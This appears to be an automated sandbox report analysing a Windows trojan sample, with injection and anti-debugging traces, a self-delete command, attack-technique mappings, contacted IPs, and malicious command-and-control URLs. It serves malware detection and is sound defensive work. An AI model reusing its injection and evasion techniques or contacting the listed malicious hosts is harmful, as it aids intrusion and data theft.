          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28AA0 mov eax, dword ptr fs:[00000030h]3_2_00F28AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28AA0 mov eax, dword ptr fs:[00000030h]3_2_00F28AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76AA4 mov eax, dword ptr fs:[00000030h]3_2_00F76AA4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58A90 mov edx, dword ptr fs:[00000030h]3_2_00F58A90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA80 mov eax, dword ptr fs:[00000030h]3_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4A80 mov eax, dword ptr fs:[00000030h]3_2_00FF4A80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CA72 mov eax, dword ptr fs:[00000030h]3_2_00F9CA72
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CA72 mov eax, dword ptr fs:[00000030h]3_2_00F9CA72
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5CA6F mov eax, dword ptr fs:[00000030h]3_2_00F5CA6F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5CA6F mov eax, dword ptr fs:[00000030h]3_2_00F5CA6F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5CA6F mov eax, dword ptr fs:[00000030h]3_2_00F5CA6F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26A50 mov eax, dword ptr fs:[00000030h]3_2_00F26A50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30A5B mov eax, dword ptr fs:[00000030h]3_2_00F30A5B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30A5B mov eax, dword ptr fs:[00000030h]3_2_00F30A5B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F44A35 mov eax, dword ptr fs:[00000030h]3_2_00F44A35
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F44A35 mov eax, dword ptr fs:[00000030h]3_2_00F44A35
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5CA38 mov eax, dword ptr fs:[00000030h]3_2_00F5CA38
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5CA24 mov eax, dword ptr fs:[00000030h]3_2_00F5CA24
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4EA2E mov eax, dword ptr fs:[00000030h]3_2_00F4EA2E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FACA11 mov eax, dword ptr fs:[00000030h]3_2_00FACA11
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28BF0 mov eax, dword ptr fs:[00000030h]3_2_00F28BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28BF0 mov eax, dword ptr fs:[00000030h]3_2_00F28BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28BF0 mov eax, dword ptr fs:[00000030h]3_2_00F28BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4EBFC mov eax, dword ptr fs:[00000030h]3_2_00F4EBFC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FACBF0 mov eax, dword ptr fs:[00000030h]3_2_00FACBF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCEBD0 mov eax, dword ptr fs:[00000030h]3_2_00FCEBD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F40BCB mov eax, dword ptr fs:[00000030h]3_2_00F40BCB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F40BCB mov eax, dword ptr fs:[00000030h]3_2_00F40BCB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F40BCB mov eax, dword ptr fs:[00000030h]3_2_00F40BCB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20BCD mov eax, dword ptr fs:[00000030h]3_2_00F20BCD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20BCD mov eax, dword ptr fs:[00000030h]3_2_00F20BCD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20BCD mov eax, dword ptr fs:[00000030h]3_2_00F20BCD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30BBE mov eax, dword ptr fs:[00000030h]3_2_00F30BBE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30BBE mov eax, dword ptr fs:[00000030h]3_2_00F30BBE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1CB7E mov eax, dword ptr fs:[00000030h]3_2_00F1CB7E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6B40 mov eax, dword ptr fs:[00000030h]3_2_00FB6B40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6B40 mov eax, dword ptr fs:[00000030h]3_2_00FB6B40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEAB40 mov eax, dword ptr fs:[00000030h]3_2_00FEAB40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC8B42 mov eax, dword ptr fs:[00000030h]3_2_00FC8B42
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4EB20 mov eax, dword ptr fs:[00000030h]3_2_00F4EB20
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4EB20 mov eax, dword ptr fs:[00000030h]3_2_00F4EB20
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE8B28 mov eax, dword ptr fs:[00000030h]3_2_00FE8B28
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE8B28 mov eax, dword ptr fs:[00000030h]3_2_00FE8B28
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9EB1D mov eax, dword ptr fs:[00000030h]3_2_00F9EB1D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52CF0 mov eax, dword ptr fs:[00000030h]3_2_00F52CF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52CF0 mov eax, dword ptr fs:[00000030h]3_2_00F52CF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52CF0 mov eax, dword ptr fs:[00000030h]3_2_00F52CF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52CF0 mov eax, dword ptr fs:[00000030h]3_2_00F52CF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1CCC8 mov eax, dword ptr fs:[00000030h]3_2_00F1CCC8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F48CB1 mov eax, dword ptr fs:[00000030h]3_2_00F48CB1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F48CB1 mov eax, dword ptr fs:[00000030h]3_2_00F48CB1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB5 mov eax, dword ptr fs:[00000030h]3_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CCA0 mov ecx, dword ptr fs:[00000030h]3_2_00F9CCA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CCA0 mov eax, dword ptr fs:[00000030h]3_2_00F9CCA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CCA0 mov eax, dword ptr fs:[00000030h]3_2_00F9CCA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9CCA0 mov eax, dword ptr fs:[00000030h]3_2_00F9CCA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18C8D mov eax, dword ptr fs:[00000030h]3_2_00F18C8D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2AC50 mov eax, dword ptr fs:[00000030h]3_2_00F2AC50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26C50 mov eax, dword ptr fs:[00000030h]3_2_00F26C50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F26C50 mov eax, dword ptr fs:[00000030h]3_2_00F26C50
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.198.102 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 130.61.77.41 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 195.35.38.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 9E0000Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeMemory written: C:\Users\user\Desktop\UgHXEfw1uL.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4536328488.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.4532225491.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2075576125.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.4531444837.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2075184468.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Users\user\Desktop\UgHXEfw1uL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid Accounts1
          Shared Modules
          Path Interception612
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          121
          Security Software Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth4
          Ingress Tool Transfer
          SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Data Encrypted for ImpactDNS ServerEmail Addresses
          Local AccountsCronLogin HookLogin Hook31
          Virtualization/Sandbox Evasion
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureTraffic Duplication13
          Application Layer Protocol
          Data DestructionVirtual Private ServerEmployee Names
          Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script612
          Process Injection
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
          Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials112
          System Information Discovery
          VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
          External Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
          Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1348466 Sample: UgHXEfw1uL.exe Startdate: 27/11/2023 Architecture: WINDOWS Score: 100 34 www.videopromarket.com 2->34 36 www.tqmsn.com 2->36 38 11 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 9 other signatures 2->48 11 UgHXEfw1uL.exe 3 2->11         started        signatures3 process4 signatures5 56 Tries to detect virtualization through RDTSC time measurements 11->56 58 Injects a PE file into a foreign processes 11->58 14 UgHXEfw1uL.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 39 1 14->17 injected process8 dnsIp9 28 www.biddrivego.com 103.224.212.216, 49722, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 www.fnb.gay 130.61.77.41, 49717, 49718, 80 ORACLE-BMC-31898US United States 17->30 32 3 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 control.exe 12 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          UgHXEfw1uL.exe22%ReversingLabsWin32.Trojan.Generic
          UgHXEfw1uL.exe32%VirustotalBrowse
          UgHXEfw1uL.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.biddrivego.com0%VirustotalBrowse
          www.tqmsn.com0%VirustotalBrowse
          www.millerstoehr.com0%VirustotalBrowse
          www.bolfm.com0%VirustotalBrowse
          www.fixerradvisory.com0%VirustotalBrowse
          www.cascadefinnish.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://word.office.comon0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.biddrivego.com0%Avira URL Cloudsafe
          http://www.fnb.gay0%Avira URL Cloudsafe
          http://www.piabellacasino347.comReferer:0%Avira URL Cloudsafe
          http://www.videopromarket.comReferer:0%Avira URL Cloudsafe
          http://www.adminonlinechecker.online/bp31/www.gchzwf.com100%Avira URL Cloudmalware
          http://www.gchzwf.com/bp31/100%Avira URL Cloudmalware
          http://crl.v0%URL Reputationsafe
          http://www.turdfi.xyz100%Avira URL Cloudmalware
          http://www.biddrivego.com0%VirustotalBrowse
          http://www.fnb.gay/0%Avira URL Cloudsafe
          http://www.fnb.gayReferer:0%Avira URL Cloudsafe
          http://www.gchzwf.com/bp31/2%VirustotalBrowse
          http://www.turdfi.xyz0%VirustotalBrowse
          http://www.spitzpr-gq.infoReferer:0%Avira URL Cloudsafe
          http://www.videopromarket.com/bp31/0%Avira URL Cloudsafe
          http://www.cascadefinnish.com/bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp100%Avira URL Cloudmalware
          http://www.spitzpr-gq.info/bp31/0%Avira URL Cloudsafe
          http://www.turdfi.xyzReferer:0%Avira URL Cloudsafe
          http://www.bolfm.comReferer:0%Avira URL Cloudsafe
          http://www.fnb.gay/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=UJqh63c9yiVXKVsa3boGAX6IISqW51ijhAAZGwRU100%Avira URL Cloudmalware
          http://www.tqmsn.com/bp31/100%Avira URL Cloudmalware
          http://www.fixerradvisory.comReferer:0%Avira URL Cloudsafe
          http://www.turdfi.xyz/bp31/100%Avira URL Cloudphishing
          http://www.alnawrasalrahhal.com/bp31/0%Avira URL Cloudsafe
          http://www.adminonlinechecker.online0%Avira URL Cloudsafe
          http://www.gchzwf.com0%Avira URL Cloudsafe
          http://www.turdfi.xyz/bp31/www.biddrivego.com100%Avira URL Cloudphishing
          http://www.turdfi.xyz/bp31/0%VirustotalBrowse
          http://www.darkpinefarm.comReferer:0%Avira URL Cloudsafe
